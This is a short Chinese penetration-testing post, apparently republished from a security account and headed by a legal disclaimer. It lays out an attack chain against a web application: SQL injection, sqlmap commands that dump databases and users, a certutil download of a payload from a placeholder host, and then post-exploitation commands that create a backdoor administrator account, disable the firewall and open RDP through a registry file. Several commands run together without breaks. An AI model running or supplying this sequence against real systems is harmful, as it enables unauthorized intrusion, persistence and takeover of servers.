声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。
前言

http://url/newdetail.aspx?id=11999' or 1=1 --
python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbspython sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

nt authority system 是内置的系统管理账户
chdir
Dir c:\


ping wt070h.dnslog.cncertutil.exe -urlcache -split -f http://funny_ip/amazing1x



#新建用户net user amazingadmin123 amazing.123456 /add#赋予权限net localgroup Administrators amazingadmin123 /add#激活用户net user amazingadmin123 /active:yes#关闭防火墙netsh firewall set opmode mode=disable#开启默认设置 netsh firewall resetecho Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "ortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg





点到即止!
来源: HACK学习呀
seo优化_前端开发_渗透技术






